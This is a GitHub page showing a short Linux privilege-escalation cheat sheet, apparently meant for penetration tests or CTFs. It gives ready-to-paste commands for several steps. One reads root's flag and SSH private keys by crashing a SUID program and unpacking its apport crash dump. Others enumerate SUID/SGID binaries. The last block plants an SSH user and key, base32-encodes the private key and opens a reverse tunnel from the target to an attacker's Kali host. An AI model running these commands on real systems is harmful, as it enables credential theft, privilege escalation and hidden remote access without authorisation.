forked from esp0xdeadbeef/cheat.sheets
-
Notifications
You must be signed in to change notification settings - Fork 5
/
lin_privesc.cheat
37 lines (28 loc) · 1.93 KB
/
lin_privesc.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
% privesc cheats
$ IP: for adaptername in $(for i in "$(ip a s | sort -r | grep -E $'[[:digit:]]:[ ]')"; do echo $(echo $i | awk '{print $2}' | replace : ''); done); do ip a s $adaptername | grep 'inet\ ' | awk '{print $2}' | cut -d '/' -f 1 ; done | uniq
# suid file reads
echo "#read file (/root/root.txt | /root/.ssh/id_rsa | /home/someuser/.ssh/id_rsa) with program with suid and then crash it (ps -aux | grep './program_name' | head -n 1 | awk '{print $2}' | xargs kill -SIGSEGV)
rm -r /tmp/crash-report
apport-unpack _opt_count.1000.crash /tmp/crash-report"
# find suid/guid files
echo 'echo "suid files: \n$(find / -perm /4000 2>/dev/null)"
echo "guid files: \n$(find / -perm /2000 2>/dev/null)"' | xclip -selection clipboard
# find suid/guid files
echo 'echo "(s|g)uid files: \n$(find / -perm /6000 2>/dev/null)"' | xclip -selection clipboard
# port (REMOTE TO LOCAL) forwarding (target 3389) (https://askubuntu.com/questions/48129/how-to-create-a-restricted-ssh-user-for-port-forwarding)
grep -E 'limited-user' /etc/ssh/sshd_config || echo "Match User limited-user
#AllowTcpForwarding yes
X11Forwarding no
#PermitTTY no
#PermitTunnel no
#GatewayPorts no
AllowAgentForwarding no
#PermitOpen localhost:62222
ForceCommand echo 'This account can only be used for [reason]'";
usermod --shell /bin/bash limited-user
rm -r /home/limited-user/.ssh 2>/dev/null
sudo -u limited-user mkdir -p /home/limited-user/.ssh
sudo -u limited-user ssh-keygen -t rsa -q -N "" -f "/home/limited-user/.ssh/id_rsa"
sudo -u limited-user cp /home/limited-user/.ssh/id_rsa.pub /home/limited-user/.ssh/authorized_keys
export LIMITED_USER_ID_RSA_BASE32=$(cat /home/limited-user/.ssh/id_rsa | base32 -w 0)
echo "echo '$(echo $LIMITED_USER_ID_RSA_BASE32)' | base32 -d > /tmp/id_rsa_LIMITED_USER_ID;chmod 600 /tmp/id_rsa_LIMITED_USER_ID; ssh -i /tmp/id_rsa_LIMITED_USER_ID -N -R <kali_port>:localhost:<remote_port> limited-user@<IP>" | xclip -selection clipboard